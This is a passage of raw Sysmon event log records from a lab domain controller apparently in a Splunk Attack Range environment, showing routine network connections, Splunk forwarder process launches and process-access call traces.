Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B9527ECA72AF582F2F41D0FDDE0D2B4,SHA256=FFB85F1B37E375824D03C5C45832F9443E4C5474BB45F0CB687C69A671B7B73A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243456Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:40.959{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60158-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 354300x80000000000000002243455Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:40.959{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60158-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 23542300x80000000000000002243454Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:51.592{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7DCFDBAE5548E1DF6560DF0DA0728F18,SHA256=9481F79DDF2411E9BFA7B5A824AD8D4CE9F304C76C2D08DB75CBA69493ED1AD9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243453Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:40.271{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local57853- 354300x80000000000000002243460Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.381{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60159-false10.0.1.12-8000- 23542300x80000000000000002243459Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:53.248{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B9F2CBCBD9B9435E9162ABD9CD978D65,SHA256=A1BC51B76BC339A2FCB675D47CB77C80AE01DD6CA8C08EE013E453369D1A5DA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243458Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:52.998{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CE71B88504B0BB4D7D6AE3B4F0963E3,SHA256=CFC327B153F995D456B76351FDD58FA5FEEA43F373F23F1DEDF51CDE10860D61,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243470Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:54.592{05ADC7E1-6DDE-603E-E4AA-00000000AD01}854011976C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243469Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:54.404{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6DDE-603E-E4AA-00000000AD01}8540C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243468Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:54.404{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243467Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:54.404{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243466Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:54.404{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243465Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:54.404{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243464Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:54.404{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6DDE-603E-E4AA-00000000AD01}8540C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243463Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:54.404{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6DDE-603E-E4AA-00000000AD01}8540C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002243462Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:54.390{05ADC7E1-6DDE-603E-E4AA-00000000AD01}8540C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002243461Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:54.029{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5EBEF3FF87271D7084B9910400CD0A8,SHA256=975CECE1230489BBE12A1E55357D3335AA005D74259AAC287648BD4338DAB038,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243488Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.592{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6DDF-603E-E6AA-00000000AD01}9152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243487Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.592{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243486Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.592{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243485Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.592{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243484Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.592{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243483Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.592{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DDF-603E-E6AA-00000000AD01}9152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243482Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.592{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6DDF-603E-E6AA-00000000AD01}9152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002243481Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.593{05ADC7E1-6DDF-603E-E6AA-00000000AD01}9152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002243480Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.420{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CE156DEA71F1F98C49F5949EA7FB33F8,SHA256=381245883065221743001D9AF58CC7BE1BAA4E130FEE46DAB604F660061B00CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243479Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.092{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6DDF-603E-E5AA-00000000AD01}8372C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243478Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.092{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243477Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.092{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243476Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.092{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243475Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.092{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243474Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.092{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DDF-603E-E5AA-00000000AD01}8372C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243473Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.092{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6DDF-603E-E5AA-00000000AD01}8372C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 